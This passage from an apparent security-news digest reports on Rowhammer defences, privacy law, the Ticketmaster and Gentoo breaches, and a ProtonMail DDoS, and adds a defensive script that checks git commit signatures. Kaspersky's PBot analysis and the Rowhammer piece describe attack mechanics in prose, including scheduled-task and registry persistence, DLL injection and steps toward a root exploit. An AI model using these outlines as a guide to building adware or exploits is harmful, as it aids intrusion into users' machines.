The issue is particularly serious on mobile devices, where hardware upgrades are not possible, the security researchers argue. They also note that existing software defenses are not effective and present attacks can circumvent all currently proposed and implemented defense techniques.

To exploit Rowhammer, an attacker needs to land a security-sensitive page into a vulnerable physical memory location and also needs to access the DRAM chip fast enough to hit the same rows before they are refreshed. They also have to determine the virtual addresses that map to the two physical rows adjacent to the victim row.

To mitigate the risks, Google disabled the contiguous heap, but left the system heap available. The company also reduced internal system heap pools to two and enforced that the system heap only returns memory pages from highmem.

By exhausting the system heap, the researchers were able to get contiguous pages and find exploitable bit flips via double-sided Rowhammer. The researchers then tricked the system into releasing pre-allocated cached memory, including the row with the vulnerable page, and developed a root exploit leveraging this attack technique.

The researchers also say it is possible to corrupt buffers belonging to another app or process, an attack scenario that could abuse privileged apps for increased damage. They also argue that an attacker could try to exhaust the Contiguous Memory Allocator (CMA) bit map, or to corrupt system memory from CMA-allocated memory. Such attacks, however, are technically challenging, the experts admit.

GuardION, the newly proposed mitigation against DMA-based Rowhammer exploits on mobile devices, focuses on limiting the capabilities of an attacker’s uncached allocations. Expensive fine-grained isolation can be applied for each DMA allocation, and GuardION isolates buffers with two guard rows: one at the ‘top’ and another at the ‘bottom’.

“This enforces a strict containment policy in which bit flips that are triggered by reading from uncached memory cannot occur outside the boundaries of that DMA buffer. In effect, this design defends against Rowhammer by eradicating the ability of the attacker to inject bit flips in sensitive data,” the researchers claim.

The mitigation, however, is based on the premise that bit flips don’t occur in memory pages physically located more than one row away from the aggressor rows. Such flips have never been reported, and the nature of the Rowhammer effect makes them unlikely to ever occur.

According to the research paper, not only is GuardION’s performance impact negligible, but its integration with the current Android code base is rather easy. A prototype implementation contains only 844 lines of code and touches only 9 files in the Android source code. The researchers are in the process of submitting the patch to Google for adoption.


California, Home of Silicon Valley, Ramps Up Online Privacy Law
29.6.2018 securityweek  Privacy

California on Thursday passed a strict new law aimed at protecting people's privacy online, a move that promised to shift the terrain on which internet firms operate in the wake of recent scandals.

The bill, signed into law by Governor Jerry Brown, followed in the spirit of the General Data Protection Regulation, which recently took effect in Europe.

The legislation cut off an initiative that is heading for the ballot in this state in the fall.

It was crafted to ensure rights including knowing what personal information is collected by companies on the internet and whether it is sold, and to whom, according to the bill signed by Brown.

The law also gives people a right to "say no" to the sale of their personal information, and calls for them to be treated the same as anyone else online if they opt to restrict use of their data.

Internet businesses that receive "verifiable" requests by people to have their data deleted will be required to do so, with a list of exceptions that include keeping what is needed to complete transactions, detect security breaches, or protect against illegal activity.

"A consumer shall have the right, at any time, to direct a business that sells personal information about the consumer to third parties not to sell the consumer's personal information," the legislation said.

"This right may be referred to as the right to opt out."

Business home pages will be required to provide "clear and conspicuous" links titled "Do Not Sell My Personal Information" that take people to opt-out pages.

People whose personal information is stored unencrypted and not sufficiently protected were also given the right to pursue civil claims.

The shift both in Europe and California came after the harvesting of Facebook users' data by Cambridge Analytica, a US-British political research firm, for the 2016 US presidential election.

- Potential to spread -

Nonprofit advocacy group Consumer Watchdog called the California legislation "landmark reform" and branded it the toughest state privacy law in the US.

"Silicon Valley companies will very likely implement many of these reforms across their entire customer base, not just for Californians," said Consumer Watchdog president Jamie Court.

"California has led the way and Californians must be ever vigilant in the next year that the legislature does not undermine these protections at the behest of tech lobbyists and moguls."

The Internet Association, an industry lobbying group, expressed concerns about the law, saying there was a lack of public input as it was hurried through the legislative process.

"Data regulation policy is complex and impacts every sector of the economy, including the internet industry," association vice president of state government affairs Robert Callahan said in a statement posted on its website.

"That makes the lack of public discussion and process surrounding this far-reaching bill even more concerning."

Callahan contended that California policymakers will need to "correct the inevitable, negative policy and compliance ramifications this last-minute deal will create for California's consumers and businesses alike."

The list of Internet Association members includes titans such as Amazon, Facebook, Google, Microsoft, Netflix and Twitter.

During a meeting Thursday with reporters at Facebook's headquarters in Silicon Valley, chief operating officer Sheryl Sandberg said the leading social network supported the California legislation.


Former Equifax Manager Charged With Insider Trading
29.6.2018 securityweek  IT

US securities regulators announced insider trading charges on Thursday against a former Equifax manager who sold shares in the company before it disclosed a giant data breach.

Sudhakar Reddy Bonthu, a product development manager at Equifax, allegedly netted more than $75,000 after placing orders on September 1, 2017 betting that Equifax shares would fall, according to a complaint by the US Securities and Exchange Commission.

Six days later, the company announced one of the biggest data breaches ever, sending shares sharply lower.

"As we allege, Bonthu, who was entrusted with confidential information by his employer, misused that information to conclude that his company had suffered a massive data breach and then sought to illegally profit," said Richard Best, director of the SEC's Atlanta Regional Office.

"Corporate insiders simply cannot abuse their access to sensitive information and illegally enrich themselves."

Bonthu, 44, a resident of Georgia, settled the SEC civil charges and agreed to return his ill-gotten gains plus interest, the agency said.

Bonthu has also been charged in a parallel US criminal case by the Department of Justice, the SEC said.

Bonthu is the second Equifax defendant in an insider trading case after authorities in March brought criminal and civil charges against former Equifax executive Jun Ying.

Key personal data, including names, social security numbers and dates of birth, were pilfered from more than 140 million Americans in the Equifax hack.

On Wednesday, the company agreed to new oversight requirements under a consent order with eight state regulators, including financial regulatory bodies in New York, Georgia and California.


Google Expands Android's Compiler-Based Mitigations
29.6.2018 securityweek  Android

Google this week announced expanded compiler-based mitigations in Android P, in an attempt to make bugs harder to exploit and prevent specific types of issues from becoming vulnerabilities.

One of these is Control Flow Integrity (CFI), which represents a set of mitigations meant to “confine a program's control flow to a call graph of valid targets determined at compile-time.” Android already supports CFI implementation in select components, but the next platform release will expand that support, the search giant says.

“This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions,” Google explains.

The idea is to reduce the set of destinations an attacker can reach to the valid branch targets determined at compile time, and to check every indirect branch at runtime against that set; when a violation of the statically determined set of allowable targets is detected, the process aborts.

By restricting control flow to a small set of legitimate targets, Google attempts to make code-reuse attacks much harder to execute, while also making memory corruption vulnerabilities more difficult or even impossible to exploit.

CFI requires compiling with Link-Time Optimization (LTO), which also results in reduced binary size and improved performance, although compile time increases. According to Google, testing has revealed “negligible overhead to code size and performance.”

In Android P, CFI will be enabled by default widely within the media frameworks and other security-critical components, including NFC and Bluetooth.

Android P also expands the number of libraries that benefit from Integer Overflow Sanitization, which is meant to safely abort process execution when an overflow is detected. Thus, an entire class of memory corruption and information disclosure vulnerabilities is mitigated.

Google has expanded the use of these sanitizers in the media framework with each release and also improved them to reduce performance impact.

“In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers,” the Internet company says.

Google decided to bring integer overflow sanitization to libraries where complex untrusted input is processed or security bulletin-level integer overflow flaws were reported. Thus, in Android P, the libui, libnl, libmediaplayerservice, libexif, libdrmclearkeyplugin, and libreverbwrapper libraries will benefit from these sanitizers.

“Moving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations,” Google notes.


Twitter shared details about its strategy for fighting spam and bots
29.6.2018 securityaffairs 
Social 

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platforms are a privileged tool for psyops and malicious campaigns; for this reason, Twitter rolled out new features to detect and prevent abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims that in May it challenged more than 9.9 million potentially automated accounts used for malicious activity every week, a significant increase from 6.4 million in December 2017.
The social media platform said that the new measures allowed it to drastically reduce the spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them shut down within a week or even within hours of being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bot activity by detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” reads the post.

The company introduced measures to audit existing accounts and to control the creation of new ones.

Twitter is increasing checks on the sign-up process to make it more difficult to register spam accounts, for example by requiring more interaction from the user, such as the confirmation of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection: its engineers are working on measures that, once suspicious activity is detected, challenge the account owner with actions that require their interaction.


Facebook, Google 'Manipulate' Users to Share Data Despite EU Law: Study
29.6.2018 securityweek  Privacy

Facebook and Google are pushing users to share private information by offering "invasive" and limited default options despite new EU data protection laws aimed at giving users more control and choice, a government study said Wednesday.

The Norwegian Consumer Council found that the US tech giants' privacy updates clash with the new General Data Protection Regulation (GDPR), which forces companies to clarify what choices people have when sharing private information.

"These companies manipulate us into sharing information about ourselves," the council's director of digital services, Finn Myrstad, said in a statement.

"(This) is at odds with the expectations of consumers and the intention of the new Regulation," the 2018 study, entitled "Deceived By Design", concluded.

Myrstad said the practices showed "a lack of respect for their users, and are circumventing the notion of giving consumers control of their personal data".

The case for the new laws has been boosted by the recent scandal over the harvesting of Facebook users' data by British consultancy Cambridge Analytica for the 2016 US presidential election.

Information for the report was collected from mid-April to early June, a few weeks after the EU rules came into force.

- 'Very few actual choices' -

The report exposed that Facebook and Google often set the least privacy-friendly option as a default and that users rarely change pre-selected settings.

Privacy-friendly choices "require more clicks and are often hidden," it said.

"In many cases, the services obscure the fact that users have very few actual choices, and that comprehensive data sharing is accepted just by using the service," the study said.

But Facebook on Wednesday denied covering up the options for users and said they had prepared for 18 months to meet the GDPR requirements.

"We have made our policies clearer, our privacy settings easier to find and introduced better tools for people to access, download, and delete their information," the company's spokesman told Norwegian public broadcaster NRK.

The EU has billed the GDPR as the biggest shake-up of data privacy regulations since the birth of the web.

The social media giant and Google separately already face their first official complaints under the new law after an Austrian privacy campaigner accused them of forcing users to give their consent to the use of their personal information.

Companies can be fined up to 20 million euros ($24 million) or four percent of annual global turnover for breaching the strict new data rules for the European Union, a market of 500 million people.


Twitter Unveils New Processes for Fighting Spam, Bots
29.6.2018 securityweek 
Social

Twitter this week shared some details on new processes designed to prevent malicious automation and spam, along with data on the positive impact of the measures implemented in the past period.

Spam and bots are highly problematic on Twitter, but the social media giant says it has rolled out some new systems that have helped its fight against these issues. The company claims that last month it challenged more than 9.9 million potentially spammy or automated accounts every week, up from 6.4 million in December last year.

Twitter says it now removes 214% more spam accounts compared to 2017. It also claims that recent changes have led to a significant drop in spam reports received from users, from 25,000 daily reports in March to 17,000 in May.

The company also reported suspending over 142,000 apps in the first quarter of 2018, more than half of which were shut down within a week or even within hours after being registered.

One measure implemented recently by Twitter involves updating account metrics in near-real time. Spam accounts and bots often follow other accounts in bulk and this type of behavior should quickly be caught by Twitter’s systems. However, the company has now also decided to remove follower and engagement counts from suspicious accounts that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter’s Yoel Roth and Del Harvey said in a blog post.

The company has also made some changes to its sign-up process to make it more difficult to register spam accounts. This includes requiring new accounts to confirm an email address or phone number.

Existing accounts are also being audited to ensure that they weren’t created using automation.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” Roth and Harvey explained. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

Finally, Twitter says it has expanded its malicious behavior detection systems with tests that can involve solving a reCAPTCHA or responding to a password reset request. Complex cases are passed on to Twitter employees for review.

Twitter also announced this week that users can configure a USB security key as part of the two-factor authentication (2FA) process.

On June 21, Twitter revealed that it entered an agreement to acquire Smyte, which specializes in safety, spam and security issues. By acquiring the company, the social media giant hopes to “improve the health of conversation on Twitter.”


Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.2018 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member of the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.


Ticketmaster Blames Third Party Over Data Breach
29.6.2018 securityweek  Incident

Ticketmaster UK has had the personal information of thousands of customers compromised. This may include names, addresses, email addresses, telephone numbers, payment details and Ticketmaster login details, the company said.

How many accounts have been compromised has not been specified, although the company says in a statement, "Less than 5% of our global customer base has been affected by this incident;" adding, "Customers in North America have not been affected."

Details of the hack have not yet been disclosed other than that it involved 'an unknown third-party'. The statement says that the company identified malicious software on a support product hosted by Inbenta Technologies (part of Ticketmaster's supply chain). It did this on Saturday, June 23, and immediately 'disabled the Inbenta product across all Ticketmaster websites'.

Ticketmaster clearly feels that Inbenta is at fault. Inbenta takes a slightly different view. In its own statement, CEO Jordi Torras, writes, "it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements." The attackers located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.

But Torras adds, "Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability." In other words, it is Ticketmaster that is at fault.

James Romer, chief security architect at SecureAuth + Core Security, explains, "a customer service chatbot was compromised by malware and exported UK customers' data to an unknown third-party." In fact, the breach could extend to other nations. While Ticketmaster says, "we understand that only certain UK customers" are affected, it also says it is notifying all Ticketmaster International customers (outside of the U.S.) that they need to reset their passwords.

Ticketmaster has further concerns to consider. According to Monzo -- an online-only bank based in East London -- it warned Ticketmaster about a potential breach in early April. Monzo had detected fraudulent card activity that seemed to point to a Ticketmaster common factor. In a blog posted Thursday by Natasha Vernier, Monzo's head of financial crime, she explains that the bank reached out to Ticketmaster, and on 12 April, "members of the Ticketmaster security team visited the Monzo office so we could share the information we'd gathered. They told us they'd investigate internally."

Within a week, Monzo was sufficiently concerned and certain that it shared its information with the U.S. Secret Service, and started to proactively replace every Monzo customer card that had been used at Ticketmaster (about 6000).

One week after its security team visited Monzo's offices, Ticketmaster informed Monzo that it had found no evidence of a breach and that no other banks were reporting similar patterns. The breach wasn't actually found until some ten weeks after Monzo first raised its concerns.

"There are going to be a few eyebrows raised this morning about this breach and when Ticketmaster really discovered it," comments Tony Pepper, CEO and co-founder at Egress. "Clearly data was at risk for some time, and apparently Ticketmaster had been alerted to the issue but didn't heed those warnings. It is going to be interesting to see how the ICO reacts when they get to the bottom of this, given the emphasis now placed on data breach reporting and reflected in the changes made under the GDPR."

This was a supply chain attack that took a long time to detect even when the company was told it had been breached. Supply chain attacks are increasing. "It's not uncommon for companies to be breached via a third-party supplier, which is why it's important to carefully consider who to work with and what security protocols they have in place," comments Andrew Bushby, UK director at Fidelis Cybersecurity.

It's worth noting that the UK government's new Minimum Cyber Security Standard for government departments actually specifies that the supply chain should be required to meet the UK's Cyber Essentials level 6.

Joseph Carson wonders whether artificial intelligence will become embroiled in the case. "Many companies are using chat bots to help automate their customer experiences, having been lured into fancy buzzwords like machine learning, artificial intelligence and virtual assistance," he notes. While the theft of personal details, financial information and passwords means these are now available on the darknet for cybercriminals to abuse, he wonders what else might have been stolen. "It will be interesting to learn," he suggests, "whether the cybercriminals also accessed the artificial intelligence information that could be used for a more targeted type of attack."

The danger to victims of this breach is primarily twofold: fraudulent use of the stolen payment details, and more calculated identity theft. "The fact that payment card information has been caught up in this breach is hugely concerning," comments Brooks Wallace, Head of EMEA for Trusted Knight. "In cases like this, details often end up for sale on the dark web, rather than in the hands of the original hackers themselves, and then end up being used for fraudulent transactions and in some cases identity theft.

"When used to make transactions, fraudsters often start by testing small transactions here to make sure it works and then ramp up to bigger purchases. Anyone who thinks they may have been caught up in this breach needs to keep a very careful eye on their bank accounts and potentially should contact their bank to change their cards." In reality, any customer of Ticketmaster, whether a victim of this breach or not, will need to be wary of the inevitable opportunistic phishing emails that follow any such breach.

One aspect of this breach will only become clear over time: how will the European data protection regulators react in relation to the General Data Protection Regulation? It's a moot point, since the actual breach occurred before GDPR came into force, although internal recognition and victim notification both occurred under GDPR. The UK's ICO will probably treat the case similarly to the Dixons Carphone breach: "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts."


Hackers Plant Malicious Code on Gentoo Linux GitHub Page
29.6.2018 securityweek 
Virus


Developers of the Gentoo Linux distribution warned users on Thursday that one of the organization’s GitHub accounts was compromised and that malicious code had been planted by the attackers.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there. We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,” Gentoo said on its website.

According to Gentoo developer Francisco Blas Izquierdo Riera, the attacker replaced the portage and musl-dev trees with malicious ebuilds designed to remove all files from a system. However, the developer says the code doesn’t actually work as intended in its current form.

Ebuilds are bash scripts used by Gentoo Linux for its Portage software management system.

Gentoo pointed out that code hosted on its own infrastructure is not impacted and the Gentoo repository mirrors are hosted in a separate GitHub account that does not appear to be affected by the breach.

“Since the master Gentoo ebuild repository is hosted on our own infrastructure and since Github is only a mirror for it, you are fine as long as you are using rsync or webrsync from gentoo.org,” users have been told.

Gentoo users have been advised not to utilize any ebuilds obtained from the compromised GitHub account prior to 18:00 GMT on June 28, 2018. GitHub has suspended the hacked account.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.


Possible Data Breach at Adidas Could Impact Millions of U.S. Customers
29.6.2018 securityweek  Incident

German sportswear company Adidas on Thursday revealed that it launched an investigation after learning of a potential data breach that could impact millions of its U.S. customers.

In a notice posted on its website, Adidas said an unauthorized party claimed to have gained access to customer information. The company learned of the possible breach on June 26 and called in cybersecurity experts and law enforcement to assist in the investigation.

The unauthorized party may have obtained usernames, password hashes and contact information – which the company describes as “limited data” – of individuals who made purchases on Adidas’ US website, adidas.com/US.

Adidas says there is no evidence that credit card or fitness information has been compromised.

Adidas told some media outlets that the incident could impact “a few million” customers, but its statement suggests that not all customers in the United States are affected.

“While adidas continues its thorough forensic review, adidas is alerting relevant consumers,” the company stated.


Pbot: evolving adware
29.6.2018 Kaspersky 
Virus

The adware PBot (PythonBot) got its name because its core modules are written in Python. It was more than a year ago that we detected the first member of this family. Since then, we have encountered several modifications of the program, one of which went beyond adware by installing and running a hidden miner on victim computers:

Miner code installed through PBot

Two other versions of PBot we detected were restricted to the goal of placing unwanted advertising on web pages visited by the victim. In both versions, the adware first attempts to inject a malicious DLL into the browser. The first version uses it to run JS scripts that display ads on web pages, the second to install ad extensions in the browser. The latter is the more interesting of the two: its developers are constantly releasing new versions, each with more elaborate script obfuscation. Another distinctive feature of this PBot variation is a module that updates scripts and downloads fresh browser extensions.

Throughout April, we registered more than 50,000 attempts to install PBot on computers of users of Kaspersky Lab products. The following month this number increased, indicating that this adware is on the rise. PBot’s target audience is mainly in Russia, Ukraine, and Kazakhstan.

Geography of infection attempts

Distribution methods
PBot is generally distributed through partner sites whose pages implement scripts to redirect users to sponsored links.
Here is the standard PBot propagation scheme:

The user visits the partner site.
When any point on the page is clicked, a new browser window pops up that opens an intermediate link.
The intermediate link redirects the user to the PBot download page, which is tasked with downloading and running the adware on the victim computer by hook or by crook. The following is a section of code from one such page:

Code of a page propagating PBot

An HTA file is downloaded. On startup this file downloads the PBot installer.

PBot propagation chain

Operating logic
PBot consists of several Python scripts executed in sequence. In the latest versions of the program, they are obfuscated using Pyminifier.

Obfuscated script code

In the new versions of PBot, modules are executed according to the following scheme:

PBot installation

The source file *.hta downloads an executable file, which is the NSIS installer of PBot, to %AppData%.
The installer drops a folder with the Python 3 interpreter, Python scripts, and a browser extension into %AppData%.
Using the subprocess library, the ml.py script adds two tasks to Windows Task Scheduler. The first runs ml.py when the user signs into the system, while the second runs app.py daily at 5:00. In addition, the winreg library is used to register app.py in the registry autorun key.
The launchall.py script runs app.py, which handles the update of PBot scripts and the download of new browser extensions.
Next, launchall.py checks whether the following processes are active:
browser.exe
chrome.exe
opera.exe
If the processes are found, the DLL-generating script brplugin.py is started. The resulting DLL is injected into the launched browser and installs the ad extension.

Writing the DLL to the browser process memory and executing the library

The browser extension installed by PBot typically adds various banners to the page, and redirects the user to advertising sites.

PBot result: Pop-up window with an ad clip on www.kaspersky.com

Conclusion
In pursuit of profit, adware owners often resort to installing their products on the sly, and PBot developers are no exception. They release new versions (and update them on user computers), complicating their obfuscation to bypass protection systems.
Kaspersky Lab solutions detect PBot with the following verdicts:
AdWare.Win32.PBot
AdWare.NSIS.PBot
AdWare.HTML.PBot
AdWare.Python.PBot

IoCs:
3cd47c91d8d8ce44e50a1785455c8f7c
1aaedcf1f1ea274c7ca5f517145cb9b5
bb2fbb72ef683e648d5b2ceca0d08a93
23e7cd8ca8226fa17e72df2ce8c43586
ad03c82b952cc352b5e6d4b20075d7e1
0cb5a3d428c5db610a4565c17e3dc05e
3a6ad75eb3b8fe07c6aca8ae724a9416
184e16789caf0822cd4d63f9879a6c81


Hackers compromised Gentoo Linux GitHub Page and planted a malicious code
29.6.2018 securityaffairs
Virus

The development team of the Gentoo Linux distribution notifies users that hackers compromised one of the GitHub accounts and planted a malicious code.

Developers of the Gentoo Linux distribution announced that hackers compromised one of the GitHub accounts used by the organization and planted a malicious code.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there.” Gentoo wrote on its website.

“We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,”

The Gentoo developer Francisco Blas Izquierdo Riera confirmed that attackers took control of the Gentoo organization on GitHub and replaced the portage and musl-dev trees with malicious ebuilds intended to delete all files from a system. The malicious code reportedly does not work as written, and GitHub has since removed the organization.

“I just want to notify that an attacker has taken control of the Gentoo organization in Github and has among other things replaced the portage and musl-dev trees with malicious versions of the ebuilds intended to try removing all of your files.” explained Francisco Blas Izquierdo Riera.

“Whilst the malicious code shouldn’t work as is and GitHub has now removed the organization, please don’t use any ebuild from the GitHub mirror obtained before 28/06/2018, 18:00 GMT until new warning.”

What is an ebuild?

“An ebuild file is a text file, used by Gentoo package managers, which identifies a specific software package and how the Gentoo package manager should handle it. It uses a bash-like syntax style and is standardized through the EAPI version.” reported Gentoo.

“Gentoo Linux uses ebuilds as the package management format for individual software titles. These ebuilds contain metadata about the software (the name and version of the software, which license the software uses, and the home page), dependency information (both build-time as well as run-time dependencies), and instructions on how to deal with the software (configure, build, install, test …).”


According to Gentoo, the code hosted on its own infrastructure is not impacted. The Gentoo repository mirrors are hosted in a separate GitHub account that was not affected by the security breach.

Gentoo users have been informed not to utilize any ebuilds downloaded from the compromised GitHub account prior to 18:00 GMT on June 28, 2018.

As part of the incident response, GitHub has suspended the hacked account. Users can verify the signatures of the commits to stay secure.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.
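Both Gentoo write-ups above end with the same advice: verify commit signatures when using git. What that looks like in practice is an added example (it is not Gentoo's own tooling): `git log --format='%H %G? %GK'` prints, per commit, the hash, a one-letter signature status and the signing key; the code turns that into a go/no-go decision, optionally restricted to an allow-list of keys. The allow-list matters here because an attacker who controls the GitHub organization can push commits signed with a key of their own choosing, which git will happily report as "good" if that key is in your keyring. The sample log output, hashes and key IDs are constructed placeholders.

```python
"""Refuse git commits whose signatures do not verify.

Added example, not Gentoo's own tooling. Status letters follow the %G?
placeholder documented in git-log(1). The sample log at the bottom is
constructed; the hashes and key IDs are placeholders.
"""
import subprocess
from typing import Iterable, List, Optional, Set, Tuple

# %G? values as documented in git-log(1), "PRETTY FORMATS".
SIGNATURE_STATUS = {
    "G": "good signature",
    "B": "bad signature",
    "U": "good signature, untrusted key",
    "X": "good signature, expired",
    "Y": "good signature, made by an expired key",
    "R": "good signature, made by a revoked key",
    "E": "signature cannot be checked (e.g. missing key)",
    "N": "no signature",
}


def parse_signature_log(log_output: str) -> List[Tuple[str, str, str]]:
    """Parse lines of `git log --format='%H %G? %GK'` into (hash, status, key_id).
    %GK is empty for unsigned commits, so the key field is optional."""
    rows = []
    for line in log_output.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) < 2:
            continue                      # blank or truncated line
        commit, status = parts[0], parts[1]
        key_id = parts[2].strip() if len(parts) == 3 else ""
        rows.append((commit, status, key_id))
    return rows


def rejected_commits(rows: Iterable[Tuple[str, str, str]],
                     trusted_keys: Optional[Set[str]] = None,
                     accept: Tuple[str, ...] = ("G",)) -> List[Tuple[str, str]]:
    """Return (hash, reason) for every commit that must not be used.

    A commit is rejected when its status letter is not in `accept`, or when a
    key allow-list is given and the signing key is not on it. Accepting "U"
    together with an explicit allow-list is the usual choice when the
    developers' keys are in your keyring but you have not set gpg ownertrust.
    """
    rejected = []
    for commit, status, key_id in rows:
        if status not in accept:
            rejected.append((commit, SIGNATURE_STATUS.get(status, "unknown status")))
        elif trusted_keys is not None and key_id not in trusted_keys:
            rejected.append((commit, "signed by key not on allow-list: %s" % key_id))
    return rejected


def verify_range(repo_path: str, rev_range: str = "HEAD",
                 trusted_keys: Optional[Set[str]] = None,
                 accept: Tuple[str, ...] = ("G",)) -> List[Tuple[str, str]]:
    """Run git against a real checkout and return the commits to reject.
    rev_range can be e.g. 'master@{1}..master' to check only what a pull added."""
    out = subprocess.run(
        ["git", "-C", repo_path, "log", "--format=%H %G? %GK", rev_range],
        check=True, capture_output=True, text=True,
    ).stdout
    return rejected_commits(parse_signature_log(out), trusted_keys, accept)


# Constructed sample of `git log --format='%H %G? %GK'` output (placeholder values).
SAMPLE_LOG = """\
a1a1a1a1 G AAAAAAAAAAAAAAAA
b2b2b2b2 N
c3c3c3c3 B AAAAAAAAAAAAAAAA
d4d4d4d4 U CCCCCCCCCCCCCCCC
"""

if __name__ == "__main__":
    rows = parse_signature_log(SAMPLE_LOG)
    for commit, reason in rejected_commits(rows, trusted_keys={"AAAAAAAAAAAAAAAA"},
                                           accept=("G", "U")):
        print("REJECT %s: %s" % (commit, reason))
```

Run `verify_range()` against the checkout and the range you just fetched before running anything from it; an empty result means every new commit is signed by a key you chose to trust. This is a check on the mirror, not a substitute for it: Gentoo's own recommendation is to take the tree from gentoo.org over rsync or webrsync rather than from GitHub.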


Apophis Squad hacker group allegedly responsible for the DDoS attack against ProtonMail
29.6.2018 securityaffairs Attack

A massive DDoS attack hit encrypted email provider ProtonMail; it was initially attributed to Russian hackers.
On Wednesday morning, ProtonMail informed customers that its systems were under an attack that was delaying the delivery of messages.

ProtonMail (@ProtonMail), 10:03 AM, Jun 28, 2018: "Our network is under attack again. No data is breached or lost, but emails will be delayed. We are working with our upstream providers to halt the attack as soon as possible. Here are the details of yesterday's attack: https://old.reddit.com/r/ProtonMail/comments/8u6k0k/protonmail_hard_down_right_now/e1ddek7/ Thank you for your understanding."

Quoted tweet, ProtonMail (@ProtonMail): "We had an incident with the network earlier today. Service has been restored and no emails were lost." https://twitter.com/ProtonMail/status/1011858507879145473
The company stressed, however, that no data was breached or lost.

Some users faced problems while using the ProtonVPN service.

The attack was prolonged; service was restored roughly three hours after the announcement.

“The attacks went on for several hours, although the outages were far more brief, usually several minutes at a time with the longest outage on the order of 10 minutes,” reported ProtonMail.

DDoS attacks are ordinary problems for ProtonMail, but according to the company, this attack was exceptional.

ProtonMail's DDoS protection provider, Radware, needed more time than usual to fully repel the attack, which according to ProtonMail peaked at 500 Gbps. Radware also said the attack used multiple vectors, including several UDP reflection attacks, multiple TCP bursts, and SYN floods.

“While we don’t yet have our own measurement of the attack size, we have traced the attack back to a group that claims to have ties to Russia, and the attack is said to have been 500 Gbps, which would be among the largest DDoS’s on record,” ProtonMail explained on Reddit.

While some of the experts blamed Russia for the attack, Radware reported that the attack was launched by systems located in the UK.

According to Bleeping Computer, the attack was carried out by a hacker group named Apophis Squad.

“In a private conversation with Bleeping Computer today, one of the group’s members detailed yesterday’s chain of events.” read a blog post published by Bleeping Computer.

“The Apophis member says they targeted ProtonMail at random while testing a beta version of a DDoS booter service the group is developing and preparing to launch.”

The leader of the group told Bleeping Computer that their first attack took the encrypted email provider down for 60 seconds.

Initially, the Apophis Squad had no particular interest in harassing ProtonMail, but decided to prolong the attack after ProtonMail’s CTO, Bart Butler, responded to one of their tweets calling the group “clowns.”


Today the group continued to target ProtonMail with another DDoS attack consisting of a TCP-SYN flood that peaked at 70 Gbps.

ProtonMail wasn’t the only target of the hackers, they also targeted Tutanota for a short time.

